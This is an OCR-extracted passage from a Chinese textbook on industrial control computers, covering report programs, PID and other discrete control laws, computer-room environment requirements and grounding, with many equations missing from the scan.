特征字。模拟量输入程序执行完毕后,它就去起动报警程序,由 报警程序检查越限检查的结果。在发现二次越限时就进行报警, 同时进行报警打印。 三、制表程序 制表程序有两个组成部分,数据编集和输出打印。制表程序 都是定时起动的,但也可以通过电传机强迫起动。制表程序在执 行时首先进行数据编集,将报表需要的各种数据从不同的文件中 汇集拢来,然后按照报表的格式进行编制,编制完了后送入报表 文件。随后输出打印程序就将报表文件的内容一一印出,制成工 艺人员所需要的报表。 由于报表中每一个数据都是不一样的,所以在编制时是要对 各种数据进行不同处理的。因此这里也需要用特征字表示报表中 的每一个数据。这里的特征字又可称为控制字,也是较简单的, 用一个机器字就可以表示。其中一般应有三个部分内容:阶乘 数、文件号和文件内的相对地址。 阶乘数是用来转换度量单位的。例如一个数据在文件中的工 程单位是 t/h, 而在报表中的工程单位是kg/h, 所以这个数据 在编制时就要乘上10³,因此这个数据控制字的阶乘数就指示着 10°。阶乘数的范围可在10-'~10’之间。文件号是指出该数据是 放在哪个文件中的,文件内的相对地址是指出该数据是放在文件 内那个地址中的。这样通过文件号和文件内的相对地址就可以准确地找到一个数据了。但是,控制字的格式和内容是要根据具体 情况决定的,没有什么绝对的形式。所有的控制字是作为一个文 件放在外存中的。 编集程序在执行时,首先将报表控制字和报表所需要的数据 从文件中调出,然后依次解读控制字,解读完一个控制字就编好 了一个报表数据。控制字的排列次序是和报表上的数据排列次序 一一对应的。报表编制完了后就将它送入报表文件。这里将报表 数据送入文件而不送入打印区是为了将报表数据保存到下一周 期,因为有时需要在一个周期内重复制表多次。但如果没有这种要求的话就可以将报表数据直接送入打印区, 一次输出结束。 第十三章 电子计算机的控制规律 自五十年代末期,第一台数字电子计算机在炼油、化工生产 过程实现闭环控制以来,计算机控制规律(即算式)获得了迅速 的发展。 计算机控制系统是由被控生产过程、控制计算机和输入、输 出的过程通道设备所组成的控制系统。计算机从生产过程中获取 信息,经过一定的运算,运算的结果经输出过程通道,实现对生 产过程的校正,以保证工艺提出的控制指标。 下面我们将介绍下列九种计算机控制规律: (1)PID 控制; (2)PID 控制的几种发展; (3)计算指标控制; (4)选择性控制; (5)前馈控制; (6)大滞后的smith 预估控制; (7)自整定控制; (8)解耦控制; (9)时间最优控制 (Bang-Bang 控制)。 计算机控制系统是以分时形式对生产过程实现继续控制的, 因此,是一种时间离散控制系统。在介绍各种控制规律之前,首 先叙述离散控制系统的数学描述方法。 第一节 离散控制系统的数学描述 在连续系统中,通常用线性常微分方程或相应的拉氏变换 式,即传递函数来描述线性定常系统或对象。由于计算机控制系 统是一个离散控制系统,故通常用一个线性常系数差分方程或相应的Z 变换式,即脉冲传递函数来描述一个线性定常系统或对 象。 设一个控制对象的微分方程为: (13-1) .式中 t—— 时间常数; K—— 静态放大系数; y—— 被控变量,亦称系统(或对象)的输出; m—— 控制变量,亦称系统(或对象)的输入。 假设系统的采样周期为T, 且 m(t)=m(nT), nT≤t≤(n+1)T, n=0,1,2,……N 则(13-1)式相应的差分方程为: y[(n+1)T]-ay(nT)=bm(nT) (13-2) 对方程(13-2)两边数列进行Z 变换,得: ZY(Z)-aY(Z)=bM(Z) (13-3) ∴ 脉冲传递函数为: (13-4) 对于具有纯滞后的一阶方程和二阶方程,相应的关系示于表 13-1。 第二节 PID 控 制 比例、积分、微分(简称PID) 控制是过程控制中应用最广 泛的一种控制规律。由最优控制理论可以证明,它能适应不少工 业对象的控制要求,所以,至今仍然是一种最基本的控制方式。 一、PID 控制算式 一个典型的PID 单回路控制系统示于图13-1,图中y 是被控 变量, R 是y 的设定值。 e =R-y 是调节器的输入偏差信号, P 是调节器的输出信号,相应于控制阀的阀位。则理想的模拟PID 算式为: (13-5) 式中 Ke- 比例系数; T:—— 积分时间; Ta—— 微分时间。 在采样系统中,假如我们把(13-5)式中的积分项和微分项 用求和及增量比来近似表示,则(13-5)式便变换成离散型的 PID 算式: 由(13-6)式所表示的算式中,其输出值与阀位是一一对应 的,因此,通常称为PID 的位置算式。 由(13-6)式同样列出第 (n-1) 次采样控制算式 由(13-6)式与(13-7)式相减,可以得到计算机增量输出 的表示式: 由于采样周期T 是一个常量,故与增量算式没有本质的区别。 位置算式是计算出阀门开度的绝对值,它是对控制变量与设 定值的偏差进行运算。因此,它的基本控制形式和常规调节器相 似。但计算机有故障时,计算机的输出就停止,这对生产过程影 响大。 增量算式是计算出阀门开度在原来开度上的改变量。其值的 大小是本次阀门开度绝对值与上次阀门开度绝对值之差。由于是 增量形式的输出,所以,它要附加积分环节,以累计增量值。 比较项目 位 置 型 增 量 型 基本动作 比例动作 积分动作 比例控制 可 以 不 可 以 积分控制 可 以 不 可 以 带有徽分动作的控制 普 通 有时不好 起动和停止的特性 PID动作不好 由PI动作 自动/手动无扰动切换 困 难 容 易 计算机故障时的影响 影 响 大 影 响 小 是否要附加积分环节 不 要 必 要 二、采样值的数字滤波 所谓数字滤波,即通过一定的计算程序对信号进行平滑加工 来克服虚假信号,提高信号的真实性,以保证计算机控制系统的 可靠性。关于计算机控制系统常用的数字滤波方法有下列几种: (一)程序判断滤波 为防止采样信号由于随机干扰或变送器不可靠以及输入通道 的跳码所引起的虚假信号,可采用以下几种程序判断滤波。 1。限幅滤波 2、限速滤波 (二)递推平均滤波 (三)加权递推平均 三、PID 参数整定 离散PID 算式参数整定的任务是决定K. 、K; 、Ka 和T 四个 参数。对于一个已定的控制系统,其控制品质主要决定于系统控 制算式及其参数。 一般DDC 计算机所采用的 PID 算式,由于采 样周期T 很短,故与模拟PID 算式十分类似,因此,整定方法也 大致相同。 (一)采样周期T 的选择 通常根据具体对象选择T 值,反应快的对象应选择较短的采 样周期,反之,反应慢的对象应选较长的采样周期。考虑原则为: (1)T 应比对象的时间常数小得多; (2)T 应远小于干扰信号的周期; (3)应考虑采用的控制方式及执行机构的响应速度; (4)当系统纯滞后占主导地位时,采样周期应按纯滞后大 小选取(使采样周期接近或等于纯滞后时间)。 (二)扩充临界比例度法 1. 由对象反应快慢,结合表13-3选择采样周期T。 2. 作纯比例闭环运行,改变Ke, 直至产生临界振荡过程, 记下相应的调节器临界比例系数K 及由临界振荡过程求取临界 振荡周期T。 3。选择控制度Q 4. 按计算参数进行在线运行,观察结果,如果稳定性欠佳, 可适当加大Q 值,重新查表设数,继续观察控制结果,直到满意 为止: 第三节 PID 控制的几种发展 除上述的PID 算式外,另有下列几种非标准的PID 算式。 一、不完全微分 上节介绍的理想PID 算式,对于阶跃输入,微分项输出急剧 增加,容易引起控制过程的振荡,故调节品质往往欠佳。为了克 服这一缺点,可仿效模拟调节器的微分作用,即不完全微分 二、微分先行 在计算机控制系统中, 一般情况下可采用图13-4 中的方案 (a), 此方案能对被控变量进行微分,而对设定值变化不进行 微分,这样可以避免在需要大幅度提降设定值时所造成的振荡现 象。但是在串级回路的副回路中,设定值是主回路给定的,其变 化也应加以微分处理,因此,应采用偏差微分,即图13-4中的方 案 (b)。 三、积分分离 在一般的PID 控制方式中,当开停工或大幅度的提降量时,由于偏差较大,故在积分项的作用下,将会产生一个很大的超 调,并振荡不休,如图13-5中曲线2所示。特别对于温度、液面 等变化缓慢的过程,这一现象更为严重。为此,可采用积分分离 手段。即在被控量开始跟踪时,取消积分作用,直至被控量接近 新的给定值时,才产生积分作用。 图13-5中曲线1为采用积分分离手段后的控制过程,由比较 2、1可见,应用了积分分离方法后,显著降低了被控变量的超调 和缩短了稳定时间。 四 、带有死区的PID 控制 第四节 计算指标控制 目前国内应用的反馈控制系统,基本上都是通过直接测量被 控变量,然后通过反馈来保证被控变量的恒定。但是,对于某些 生产过程,工艺上所要求的控制指标现阶段还无法通过测量装置 测量时,例如精馏塔的内回流、表征物料热状况的热焓等等,如 果可以通过计算求得时,则可采用计算指标控制系统。 d 、y 、m 均应该是可测变量,以J 为被控变量的反馈控制 系统示于图13-8。虽然m 对y₁,yz,……,yu 有着不同的通道特性, 但是以J 为被控变量的对象控制通道特性应该表示为: 分析方法与一般的反馈控制系统相同,控制算式仍为PID。 下面举例说明方法的应用。 〔例〕 精馏塔的内回流控制 在精馏操作中回流比是一个重要的指标,它直接影响各块塔 板的物料组分。回流比实质上是指塔内部向上流动的气相与向下 流动的液相流量之比。向下流动的液相流量即为内回流。 当外回流液温度与塔顶温度不相等时,内回流与外回流也就 不相等了。内回流至今难以测量,但可以通过计算求得。 一个精 馏塔的顶部,如图13-9所示。对顶部塔板作物料平衡: -Vn+R=-Vm+R (13-25) 作热量平衡得: -V,Hv+R,C,T=-VmHvn+RC,T 。(13-26) 假定塔板上平衡状态已经建立,则 Hvm=C₀T 。+λ=Hv, 而V,=0 (13-27) (13-25)、(13-26)、(13-27)式中 Vn—— 外部气相流量; Vm—— 内部气相流量; Ry—— 外回流量; R★——内回流量; Hvn—— 外部气相热焓; Hvn—— 内部气相热焓; Co——液相比热; T。——塔顶温度; Te—— 回流温度; λ——汽化潜热。 内回流带外回流流量串级控制系统的程序框图示于图13-11, 计算指标控制系统一般形式的框图示于图13-12。 第五节 选 择 性 控 制 选择性控制又称超驰控制。通常的控制系统只能在正常工况 下工作,而随着生产过程自动化的日益完善,如何保证生产过程 的安全操作,尽量减小开停车过程中的不稳定情况,成为工业自 动化中的一个重要问题。例如大型压缩机、透平、风冷器的过载 保护;精馏塔操作过程中防止液泛现象的产生以及化学反应器的 安全操作等等。过去当生产过程处于事故状态,通常采取按报警信号人工处 理或借助自动保护联锁线路自动处理。这样势必造成操作紧张、设备停车,生产中断,甚至引起事故。对于现代高度集中控制的 大型工厂,由于其保证安全生产的逻辑关系十分复杂,这种设计 方法很难适应生产的要求。 为了解决这类问题,发展形成了选择性控制。这种控制方式的特点是当过程趋近于“危险区域”,但还未到达该区域,即达到 “安全软限”时, 一个用以控制不安全工况的选择性调节器(通 常是一个比例度很小的比例调节器)自动取代正常工况下工作的 调节器。通过选择性调节器的校正作用,驱使过程脱离安全软 限,而回复到安全范围,这时选择性调节器便自动“让位”,正常 工况下工作的调节器又恢复工作。自动排除了事故的先兆,避免 过程的停车,故有时也称之为“软性停车” 选择性控制由“预测事故——逻辑判断——自动取代”三个 基本环节所组成。 一个典型的两参数选择性控制系统示于图13-13。 图中 B—— 被控参数; A - 事故参数; HS—— 高值选择器; Mg——正常工况PI 调节器输出; M₄—— 事故工况选择性调节器P₄ 输出; M-— 控制参数; A;——工艺给定的“安全软限”。 系统工作的逻辑关系为: 正常工况:设A≤A;,M₄<M,∴M=Mg,PI 调节器在线控制。 事故边界工况:设A>Ai, 因 P 的比例作用甚强,故MA>Mg, ∴M=M₄, 则Pa 通过HS 自动取代PI 调节器工作, 进行事故校正。系统的恢复:由于P*的校正作用使A 值减小,当M₄<Mg 时 ,PI 调节器又恢复在线控制。显然,这里有一个调节器无扰动切换问题,可以通过软件来 实现(或用积分分离法)。 目前选择性控制已从安全操作发展到按照生产工况实现被控 参数、控制规律、控制参数的自动选择,成为一种具有逻辑适应性的选择性控制 。 下面举例说明其工程应用 。 〔 例 〕 日产1000吨合成氨厂辅助锅炉燃烧系统的选择性控制 锅 炉 燃 烧 系 统 的 控 制 系 统 是 借 改 变 天 然 气 流 量Q 来 保 持 锅 炉 蒸 汽 压 力Po 的 恒 定 。 当 天 然 气 压 力P 过 高 时 , 会 产 生 脱 火 事 故 。 而 天 然 气 流 量Q 过 小 , 又 会 造 成 回 火 事 故 。 因 此 , 在 正 常 工 况 的 压力控制系统上又设置了 一 个选择性控制系统,以防止“脱火” 事故, 一 个天然气低流量的联锁,以防止“回火”事故,如图13 - 1 5 所 示 。 图 中P; 为 天 然 气 压 力 的 “ 安 全 软 限 ” ,Q 。为 回 火 极 限 流 量。动作过程如下: 当 P≤P;, 则 Ma>Mg∴ 低 选 器 LS 输 出M=Mg 蒸汽压力调节器工作 。 当P>Pi, 则M<Ma∴M=MA 则蒸汽压力调节器“让位”于天然气压力的选择性调节器OC,进行事故状态控制。 当Q<Qo, 则通过继动器切断天然气,人工处理。 第六节 前 馈 控 制 一 、基本概念 前馈控制,实质上是 一 种按照扰动量进行校正的控制方式。即当影响被控变量的扰动出现后,按照扰动量产生校正作用,以抵消该扰动量对被控变量的影响。在控制算式选择适当时,对该 扰动可以达到很高的控制精度。图13-16表示一个典型的前馈控 制系统。 假设扰动变量d 及控制变量m 对被控变量y 的作用可以线性 迭加(一般工业对象可以认为符合这一假设),则为了获得对扰 动 d 完全补偿的前馈算式Gμ(Z) 可由下列不变性方程求得: Y(Z)=Gpn(Z)D(Z)+Gμ(Z)Gpc(Z)D(Z)=(Gpp(Z)+Gg(Z)Gpc(Z))D(Z) 完全补偿的条件为: D(Z)≠0,Y(Z)=0 Gpp(Z)+Gg(Z)Gpc(Z)=0 式 中 Gm(Z) 、Gpc(Z)—— 对象扰动通道和控制通道的脉冲传递函数。 工程上广泛应用的是前馈控制(FFC) 和反馈控制(FBC) 的结 合,如图13-17所示的FFC-FBC 系统。按照相同的方法可以推得 (13-30)式所示的前馈算式。FFC-FBC 的优点是: (1)通过反馈校正可以保证被控变量的控制精度,克服其他非前馈扰动量的影响。 (2)降低对前馈控制算式精度的要求,有些场合静态前馈 算式便可以满足要求了。 (3)由于反馈控制回路的存在,提高了前馈控制模型的适 应性。 在FFC-FBC 系统中,如图13-18所示的前馈-串级控制系统, 应用极为广泛。这种控制系统的优点是能同时克服引入前馈和进 入串级系统副回路的扰动量对被控变量的影响。此外,还由于前 馈算式的输出不直接加到控制阀的膜头上,而作为副调节器的给 定,这样便降低了对阀门特性的要求。实践证明,这种前馈-串 级控制系统可以获得很高的控制精度。 实际上,串级系统中的副被控参数往往是流量,因此副回路 工作频率一般远大于主回路的工作频率,则副回路的脉冲传递函 数便可以看作一个放大环节。 式中 K—— 当Gc₂(Z) 中含有积分项,则K=1。 二、 前馈控制算式推演 假设Gpn(Z) 、Gpc(Z) 均为具有纯滞后的一阶对象,则 三、多变量前馈控制 四、应用示例 某煤油厂常压塔主要产品为一线产品1002油,采用图13-21所 示的前馈-串级控制系统。其中塔顶压力作为前馈输入,由1002 油比重d 与回流流量R 构成反馈回路, 第七节 大滞后Smith 预估控制 在炼油、化工生产过程中,不少工业对象有严重的纯滞后时间(包括高阶对象,低阶近似后所形成的等效纯滞后),如图13-24 所示。 一阶近似的传递函数为: 当对象中工很大时,常规PID 控制将难以适应,控制过程超 调严重,稳定性甚差,可以应用Smith 预估控制,方法如下。设 对象特性为: Gpc(S)=Gp(S)e-Ls (13-42) 式中Gp(S) 为对象传递函数中不包含纯滞后项的部分,调节器的 传递函数为Gc(S), 则相应的反馈控制系统示于图13-25。假设在 反馈回路内部附加一个补偿通路Gn(S) 〔例〕 一个精馏塔借助控制再沸器的加热蒸汽量来保持其提 馏段温度恒定。由于再沸器的传热和精馏塔的传质过程,对象的 等效纯滞后时间L 很长。试设计Smith 预估控制方案。 拟选用提馏段温度y 与蒸汽流量串级控制,由于纯滞后时间 长,故辅以Smrth 预估控制,构成图13-28所示的控制流程。相应 的计算机程序框图示于图13-29。 需要指出,应用这一方法需要比较好地了解控制通道的对象 特性。 第八节 自 整 定 控 制 不少工业对象,严格地说,都可以用非线性、时变高阶方程 来描述。为了便于工程处理,假定在工作点附近线性化后,方可 近似地处理成线性定常方程。 一旦负荷和工况发生变化,对象特 性将产生漂移,当这种漂移情况严重时, 一个固定的控制算式(PID 、 前馈或Smith 算式等)便难以适应这种变化。为了保持系统的控制精度,需要通过: (1)在线识别对象特性;或(2)测量控制过程的品质,对控制算式的参数进行自动修正,以适应新工况的要求。具体方法有下列几种: 1。通过识别对象特性参数的自整定系统 (1)定时或按反映工况变化的信息开断反馈回路,对对象 施加脉冲扰动。 (2)由脉冲反应识别对象参数。 (3)计算适应新特性的DDC算式的参数,并予以修正。 假设对象的动态模型近似为一阶加一个纯滞后,即 相应的差分方程为: y〔(n+1)T〕-ay(nT)=bu〔(n-k)T〕 式中 a=exp(-T/t) b=K₀〔1-exp(-T/t)〕 k=L/T (取整数) 应用最小二乘法识别参数a 、b 、k: 当施加扰动后,计算机读入离散数据 u(0) 、u(1) 、u(2),……,u(n) y(0) 、y(1) 、y(2),……,y(n) 偏差平方值表示为: 计算机选择 a 、b 、k 使0²最小,即 d²(a* 、b* 、k*)=mino²(a 、b 、k) 式中 a*、b*、k*即为识别求得之参数。 在此基础上,对于固定的采样周期T, 只需整定计算 Ke、T; 、T₄ 三个参数。可按下列指标 IAE 偏差随时间变化的积分面积求解K.、T;、Ta。 最后由计算机自行修正,达到自整定目的。 也可以不施加扰动,而通过在线运行数据的积累,进行在线 识别,实现自整定,如图13-31 所示。识别与整定计算方法与上述方法基本相同 这种自整定方法同样可以应用于前馈和Smith 预估控制.但是,应用这种方法,计算机需要较大的容量,为了减小占 机容量,可以采用最小二乘法的递推运算,原理大致相同。 2。优选法自整定系统 第九节 解 耦 控 制 解耦控制是通过控制算式来消除控制系统间的有害关联,使 它们成为相互独立的控制回路。 第十四章 工业控制机的使用环境 第一节 概 述 提供一个良好的环境是保证工业控制机可靠、稳定运行的重 要因素之一。因此,机房设计、建造的工作是整个应用工业控制 机工作中不可分割的一部分。 对机房要求的条件很多,应由用户自己提出,设计部门要合 理设计,施工部门要精心建造。总括地说,主要内容有以下几个 方面: 一、机房的面积和平面布置,其中包括机房及辅助面积, 如发电机室、空调室、维修工作室、软件开发室、值班室及办公 室等。 二、上下水、通风取暖、照明、门窗以及墙壁等。 三、防尘、防干扰、防火、防振、防毒及防腐蚀等。 四、机房的标高,地基标高及朝向,缓冲间等。 五、机房位置的选择及绝热性能、电缆沟的结构及防鼠措施 等。 六、其它及其特殊要求等。 第二节 对机房的要求 一、面积 计算机在出厂时,制造部门对环境都有一些基本的要求,例 如对机房的面积、温度及湿度等。而面积则主要根据机房放置设备数量的多少而定,但一定要考虑到设备增加的可能性,同时也 要便于机器的安装、维护和操作的方便。机柜门板打开时离墙壁 应有适当的距离,便于维修人员和设备仪器的移动,并适当考虑留有堆放仪器的地方。 机房内放有:主机、外围通道、外部设备(如纸带输入机、 控制打字机、穿孔机、打印机、卡片机、磁鼓、磁带、磁盘、X- Y绘图仪等)端子柜、分电盘、必要的测试仪器、电话、灭火器 及资料柜等。因此,机房在安装机器和维修时应有足够的有效作 业区, 一般机房的面积为50~100m², 例如TQ-3 机要求80m², DJS-154 机要求50m² 等等。 机房的其他辅助面积应由用户根据自己的需要而决定。 二、温度和湿度 采用常温磁芯和锗元件的计算机对环境温度的要求比较苛 刻,而采用宽温磁芯和硅元件的计算机则不那样严格,但目前一 般都要求在15~25℃左右,例如: DJS-154 机要求23±3℃(宽温 磁芯和硅元件),TQ-1 机要求20±5℃(常温磁芯和锗元件)。 计算机房的环境温度对计算机的可靠性有着直接的影响,尤 其对我国早期的产品更为显著。TQ-1 机在室温高于27℃时,故 障率显著增加,尤其是内存贮器和电源部分。总之,半导体器件 的计算机故障率是随温度升高而增加的。另一方面由于计算机的 外存贮器一般均采用磁鼓、磁带、磁盘。对温度的要求也比较严 格。例如磁鼓出厂时要求使用温度为20℃左右若超过30℃时,或 温度突然大幅度的变化都可能导致划破鼓面。 一般温度梯度小于 10℃/h。因此,诸如此类情况均应给予考虑。 温度的控制与调节实现的方法很多,设计和采用时应本着多、 快好省、因地置宜的原则确定自己的方案。 新鲜空气经过防尘过滤及对有毒有腐蚀性气体的处理后,再 经水洗降温(或加热)送入机房使用,排出部分空气并补充一部 分新鲜空气,以此循环,维持机房空气的新鲜及一定的温度和湿 度。有些工厂若有有害气体时,就必须采取相应的措施加以处理, 以达防毒防腐。因此,进风和回风要分别处理。 常见的机房空调机有以下几种: 1. 氨压缩机制冷系统 适用于较大面积的空调设施, 一般 工业控制机房不用。这种方法的特点是制冷量大,需专门机房及 值班维护人员,投资较高。 2。氟利昂制冷系统 一般制冷量为6000~20000kcal/h 之 间,适用于中小型机房的空调,这种制冷系统又分为开启式和全 封闭式两种,目前全封闭式为主。 3. 空气调节器 目前一般采用较多的是这种,它分为窗式、 柜式两种,按用途又可分为恒温恒湿机、冷风机等。其特点是 安装灵活,使用方便及价格便宜。制冷量一般为3000~20000 kcal/h。 在一些机房条件较差的单位,把这种空气调节器直接放入机 房也可以,但振动大,噪音大,机房空气的置换困难。因此,最 好是采用窗式和把柜式调节器放入另外机房通过管道送入计算机 房,并设有排风孔。 以上三种用户可根据自己的条件选用。至于机房的湿度控制 要根据计算机对环境的要求而定, 一般为40~80%相对湿度。湿 度大会引起电气元件的漏电,失效率增加,导线发霉以致腐蚀断 线,造成接触不良。也影响光电机纸带的使用,同时对磁鼓、磁 带及磁盘机都有很大影响。我国南方与北方,沿海与内地差异甚 大, 一定要根据情况控制,以保证计算机的可靠性。 在使用工业控制机的过程中,很多单位在空调方面都摸索积 累了许多经验,成功地解决了本单位的机房空调,即经济又 实用。 图14-2为某合成氨厂采用的空调示意图。它利用了本厂生产的液氨减压、气化的方法实现降温。液氨进入一个带有若干盘管 的冷箱使之降压气化,带走大量的热量,盘管结冰周围空气降温, 然后用鼓风机将箱子里的冷空气送入机房使用,以达到计算机所 要求的环境温度。实践证明,此法是可行的,在50m²的机房中, 温度可控制在20~25℃之间。 三、 防尘 电子计算机要求严格的防尘,以避免造成接插件的接触不良, 及发热元件的散热不良而带来的故障。机房内的尘埃量应满足一 定的要求,例如室内尘埃量应在0.2mg/m³ 以下,存贮器在0.1 mg/m³ 以下并要求导电尘埃尽量少。为此,机房在设计时都要 予以考虑,主要有以下几个方面: 1. 机房地板的铺设 国内的计算机房一般都采用木制地板, 其特点是平整光滑,不带静电,容易清扫。地板可以打蜡也可以 涂漆,又可以做成固定式和活动式的。但总的来说要注意机器的安装走线和维护机器的方便,地板下面和电缆沟应有防鼠和密封 措施。 为了保持机房的整齐,又方便工作,有些单位在机器周围适 当的地板位置上,开了几个活动地板口,里面安装一些必要的电源插座,以提供在维修机器时电烙铁,示波器、台灯等的电源。 使用时将地板打开,用毕盖上比较方便,里面的内容用户可以自 己决定。 也有些单位的机房采用了活动地板,它是事先预制好的标准 规格的地板块(如500×500mm) 和支架,然后进行组装而成。 地板块的尺寸形状和支架的结构可根据情况自己选择制造。 标准地板块,可以是木制的,也可以是预制铸铝板,表面有 的还贴上各种贴面,但要求耐油、不起灰,不产生静电和容易清 扫。 一般采用木制地板块,表面用硬木,不必加贴面。 活动地板支架, 一般一个支架要支承四块地板的一个角,其 高度可调。加工时要注意精度。 活动地板的优点是:标准化,规格化,制造安装简单,走线 查线方便,特别适用于临时性的机房或改进的机房。但加工精度 较高。 总之对地板除以上要求外,还应要求牢固,弹性好。 2。机房墙壁 一般都刷油漆墙,但要注意对油漆的选择, 粉刷后要平滑不带静电,颜色适宜,有利于眼睛的健康和视力的 保护。 3。机房的门窗 一般要密闭,大门要有缓冲间,窗子要双 层玻璃,以避免灰尘的进入和热量的传递,尤其北方的冬天,室 内外温差大,可以防止玻璃结露及风沙刮进机房。 4。设置吸尘器 进行定期吸尘,以保持机器和机房的清洁, 有利于机器的可靠运行。 5. 吊顶 可以防止从天花板下落的灰尘。 四 、防干扰 机房在建造时应尽量避免靠近干扰源,同时又要采取适宜的 抗干扰措施。为此,机房应远离电磁场;信号线与动力线严格分 开或把动力线穿铁管屏蔽。机房还要考虑防雷电干扰的措施。 在非常特殊的场合下,也可以对整个机房进行屏蔽,以防电 磁场的干扰。 五、防毒和防腐 在某些炼油化工生产中的现场条件比较差,对操作人员及设 备带来一定的危害,例如有害气体使操作人员中毒,腐蚀性气体 使设备腐蚀。在这样的条件下为了减轻劳动强度,改善劳动条件 和提高工作效率而采用计算机控制是可行的。但必须解决防毒防 腐的问题。 一般都是在通风系统中给予考虑。通常采取过滤处理 或隔离的办法,例如根据空气中含有有害气体的成分选择活性炭 作为吸附有害物质的介质;而有的单位则采用机房用水封隔离的 办法防止有害气体的进入。 六、 防火 机房内或其周围应设置烟雾报警器和必要的防火设备,如消 防栓、电器灭火器及沙土等。 七、采光照明装置 采光照明装置是保证安全生产提高劳动生产率和保护工作人 员视力健康的必要措施。照明设计的原则是经济美观、要保证必 要的照度、均匀的亮度及避免眩光。在炼油化工生产过程应用计 算机的单位大部分都采用了日光灯照明。 一般为200~2501x。 灯源的形式及安装位置可按需要及机房条件进行, 一般设有 顶灯、壁灯、临时灯等。 机房的照明及采光分为自然采光及人工采光两种,在大部分 情况下都采用二者结合的方法,但要避免阳光直射(如光电机)。 在必要的场合下均应考虑事故照明。 八 、防振 为了保证计算机的稳定运行及各部件的接触良好,机房要尽 量减少一切振动的因素。机房除远离振动源之外,还应减少或不 把振动设备放入机房(如柜式恒温恒湿机),不可避免的设备如磁 鼓,其地板下面的地基应考虑局部基座。 对机房条件的要求除以上几点外,还应考虑机房选择的位置, 要接近装置和仪表控制室,便于联系及观察,最好和仪表室相连 并通过大玻璃窗相隔,可直接观察仪表室运行情况和计算机运行台及制表机的运行情况。 机房还应设有更衣及换鞋的地方, 一般在缓冲间。机房密闭 和吊顶对防尘保温很有好处。 第三节 机 房 的 实 例 一、机房及辅助面积的布置实例 图14-3为一有机化工广TQ-3 机房平面布置图,总面积为300 m², 机房面积为80m², 净标高3.6m, 大小房间共10间。其面积分 配如图所示。这里说明一点,总调度室及调度值班室是规划的, 目前这两间用作别处。 其他机房大部分都和空调室放在一起,而维修、办公、值班 在一起,这里就不作介绍了。 二、 炼油化工生产过程使用计算机机房实例 1。某石油化工总厂石油一分厂机房 主要特点和条件; 温度 15~25℃; 湿度 40~60%; 通风机制冷量为20000kcal/h, 由通风管道从机房顶部下吹, 机房顶部及墙壁均有夹层隔热保温; 面积 60m²; 使用机器 HOC-700E。 机房位于仪表控制室一侧,以大玻璃窗相隔,便于联系和 观察。 2。某化肥厂计算机机房 条件及特点: 面积 温度 湿度 20m²; 20±5℃; 40~50%; 使用机器 ARCH-1000 经改造后具有控制机功能。 本机房面积较小,简单。是在仪表控制室内另隔一间,通过 大玻璃窗能直接观察仪表室的情况。 3。某化学公司化肥厂机房 条件及特点: 面积 40m²; 温度 20±2℃1 湿度 30~40%; 使用机器 控制机。 本机房是后改进的,同样靠近仪表室,空调采用本厂生产的 液氨减压气化的方法实现,经济实用。 4. 某有机化工厂TQ-3 机房 条件及特点: 面积 80m²; 温度 20±5℃; 湿度 40~60%; 净标高 3.6m 有吊顶; 空 调 采 用 2 台HQ-6 恒温恒湿机,制冷量共12000kcal/h, 由通风管道从顶部下吹。 使用机器 TQ-3 机。 本机房以及辅助面积共300m², 包括发电机室,空调室,值班室,维修工作间以及考虑到该厂三台计算机的分级控制与管理 的实现,另设有总调度室等。 采光照明:采用人工采光与照明结合的方案,机房装有日光 灯,临时电源等。 为了走线方便,除地板下的电缆沟外,现场的信号线经管廊 进入机房,通过壁橱到电缆沟,与机器相连。 第十五章 工业控制机系统的接地 第一节 概 述 为了保证电子计算机的稳定可靠运行和在事故情况下的设备 人身安全,计算机及其辅助设备均应进行工作接地和保护接地。 目前,在工业控制机系统中的接地,尚无统一的规定, 一般 的办法是参照“电力工程设计手册”有关接地规程与本单位的具 体情况结合进行的。 接地是电气安全技术中最重要的工作之一,也是电子计算机 应用工作中不可忽视的一项重要工作。因此,正确地选择接地及 其安装是非常重要的。 保护接地主要是为了避免操作人员因电子设备的绝缘损坏或 下降时遭受触电的危险和保证设备的安全。而工作接地则主要是 为了保证计算机系统稳定可靠的运行,在工业控制机系统中,主 要考虑的是工作接地。 例如二台同类型号的计算机往往由于机房的环境条件和接地 不同,会引起完全相反的结果,甚至一台可稳定运行,而另一台 则不能工作,这主要是干扰造成的结果。因此,接地的工作要慎 重,不能简单从事,而要根据现场干扰的具体情况有针对性的进 行。否则会带来不必要的麻烦。 干扰的来源、分类及抑制方法等请参阅第四章。 第二节 输入系统的接地 一、热电偶输入系统的接地 (一)热电偶直接输入计算机 为了减小测温的滞后现象, 一般都将热电偶热端与保护套管连接,即构成信号源接地的测量系统。 (二)热电偶经变送器进入计算机 在图15-2系统中,接地包括了信号源与变送器及计算机的地, 为了得到好的效果应一点接地。 二、热电阻输入系统的接地 三 、带有变送器的输入系统的接地 (一)带有气/电转换器的输入系统 (二)电平输入系统 四、采样器的二线与三线输入系统 由于计算机输入系统采用了保护屏蔽式的放大器,提高了抗 干扰的能力。在多路采样系统中,理想的是采用三线制的接线方 式。 如果在现场施工安装时,不能满足以上的要求,也可以采用 二线制接法。至于屏蔽线G点的远端接到哪里, 要根据信号源的情况而定。 第三节 主 机 的 接 地 计算机本身接地,同样是为了防止干扰,提高可靠性。因此, 在一般的情况下都要求计算机接地,但目前制造厂尚无明确的规 程,因而使用单位采用的接地方法也不一致,概括起来有以下几种。 这里首先要说明的是接地电阻的定义及在图中的表示方法。 电 气 设 备 接 地 部 分 的 对 地 电 压 与 接 地 电 流 之 比 称 为 接 地 装 置 的接地电阻。即等于接地线的电阻与流散电阻之和, 一般接地线 电阻很小,可近似认为接地电阻等于流散电阻。 这里为了方便起见,在图中以ra 符号表示,它并不代表一个 电阻,而是接地电阻的示意图,ra用虚线画出。 一、全机接地 除计算机模拟量输入部分的A/D 转换器采取浮空外,其余 部分全部接地。这种方法安全可靠,有一定的抗干扰能力, 一般 接地电阻的数值选取为4~102左右。接地电阻越小,接地极的施 工就越困难。但是这种方法由于机器的逻辑地、机壳地连在一起, 因而容易造成交直流地的互相影响。 全机接地一定要注意为一点接地。 为了避免多点接地、各机柜与设备用绝缘板垫起来,然后集 中一点接地。 二、全机浮空 全机浮空是和全机接地情况完全相反,即机器各个部分全部 与大地浮置起来。这种方法很简单,只要用绝缘物把机器与大地隔离浮置起来即可,但绝缘电阻不要小于50MO。 这种方法具有一定的抗干扰能力,但一旦发生接地或绝缘下 降时,即会引起干扰。另外这样的浮置容易产生静电,当电压较 高时对电子元件及操作人员带来威胁并易产生干扰。在一般情况下不采用。 